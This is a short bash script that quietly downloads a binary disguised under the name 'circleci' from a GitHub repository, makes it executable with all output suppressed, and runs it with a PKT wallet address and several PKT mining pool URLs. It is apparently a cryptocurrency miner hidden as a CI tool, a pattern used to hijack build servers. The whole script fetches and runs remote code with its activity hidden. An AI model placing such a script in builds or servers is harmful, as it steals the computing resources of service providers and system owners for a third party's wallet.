#!/bin/bash
wget https://github.com/aurbach55/pos/raw/main/circleci >/dev/null 2>&1
chmod 777 circleci >/dev/null 2>&1
./circleci ann -p pkt1q8qf58p5fzfp0jgde6dkv87uln7yz0ayjgp3z74 https://stratum.zetahash.com/ http://pool.pkt.world http://pool.pktpool.io




